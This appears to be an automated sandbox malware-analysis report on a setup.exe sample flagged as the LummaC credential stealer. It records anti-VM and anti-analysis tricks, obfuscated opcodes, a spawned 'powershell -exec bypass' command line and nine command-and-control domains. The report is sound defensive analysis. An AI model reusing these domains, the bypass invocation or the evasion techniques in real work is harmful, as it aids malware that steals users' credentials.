Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: setup.exe Static PE information: More than 747 > 100 exports found
Source: setup.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: setup.exe Static file information: File size 84538743 > 1048576
Source: setup.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x527200
Source: setup.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x326e00
Source: setup.exe Static PE information: More than 200 imports for USER32.DLL

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="71Za1bMT4p7rZalhixa.l.bxuLqtqavi.hc0woY.dYQ-1734782322-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="71Za1bMT4p7rZalhixa.l.bxuLqtqavi.hc0woY.dYQ-1734782322-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> < Jump to behavior
PE file contains sections with non-standard names
Source: setup.exe Static PE information: section name: .didata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\setup.exe Code function: 0_3_03F80C05 pushad ; iretd 0_3_03F80C69
Source: C:\Users\user\Desktop\setup.exe Code function: 0_3_00FDB576 push 0000006Bh; retf 0_3_00FDB588
Source: C:\Users\user\Desktop\setup.exe Code function: 0_3_00FD5141 push FFFFFFBFh; ret 0_3_00FD5172
Source: C:\Users\user\Desktop\setup.exe Code function: 0_3_03F80C05 pushad ; iretd 0_3_03F80C69
Source: C:\Users\user\Desktop\setup.exe Code function: 0_3_03F80C05 pushad ; iretd 0_3_03F80C69
Source: C:\Users\user\Desktop\setup.exe Code function: 0_3_00FE4DC2 push ecx; retf 0_3_00FE4DE8
Source: C:\Users\user\Desktop\setup.exe Code function: 0_3_00FE43C1 push eax; iretd 0_3_00FE43C2
Source: C:\Users\user\Desktop\setup.exe Code function: 0_3_00FE7174 push esi; retf 0_3_00FE7177
Source: C:\Users\user\Desktop\setup.exe Code function: 0_3_00FE5B26 push C69AAC32h; iretd 0_3_00FE5B3B
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0111D816 push eax; mov dword ptr [esp], D7D6D5A4h 0_2_0111D817
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0110A890 push ss; retf 0_2_0110A89C
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0111AAC6 push eax; mov dword ptr [esp], 0B0C0D0Eh 0_2_0111AAD4
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\setup.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\setup.exe System information queried: FirmwareTableInformation Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2081 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\setup.exe TID: 4248 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\setup.exe TID: 5848 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2596 Thread sleep count: 2081 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1900 Thread sleep count: 313 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3120 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: setup.exe, 00000000.00000002.2028307688.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpg
Source: setup.exe, 00000000.00000002.2028307688.0000000000F92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWT
Source: setup.exe, 00000000.00000002.2028307688.0000000000F92000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E0349 mov edx, dword ptr fs:[00000030h] 0_2_010E0349
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E0909 mov eax, dword ptr fs:[00000030h] 0_2_010E0909
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E0CB9 mov eax, dword ptr fs:[00000030h] 0_2_010E0CB9
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E0F58 mov eax, dword ptr fs:[00000030h] 0_2_010E0F58
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E0F59 mov eax, dword ptr fs:[00000030h] 0_2_010E0F59
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
LummaC encrypted strings found
Source: setup.exe String found in binary or memory: crosshuaht.lat
Source: setup.exe String found in binary or memory: sustainskelet.lat
Source: setup.exe String found in binary or memory: rapeflowwj.lat
Source: setup.exe String found in binary or memory: necklacebudi.lat
Source: setup.exe String found in binary or memory: discokeyus.lat
Source: setup.exe String found in binary or memory: aspecteirs.lat
Source: setup.exe String found in binary or memory: energyaffai.lat
Source: setup.exe String found in binary or memory: grannyejh.lat
Source: setup.exe String found in binary or memory: principledjs.click
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="71za1bmt4p7rzalhixa.l.bxulqtqavi.hc0woy.dyq-1734782322-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="71za1bmt4p7rzalhixa.l.bxulqtqavi.hc0woy.dyq-1734782322-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> < Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\setup.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
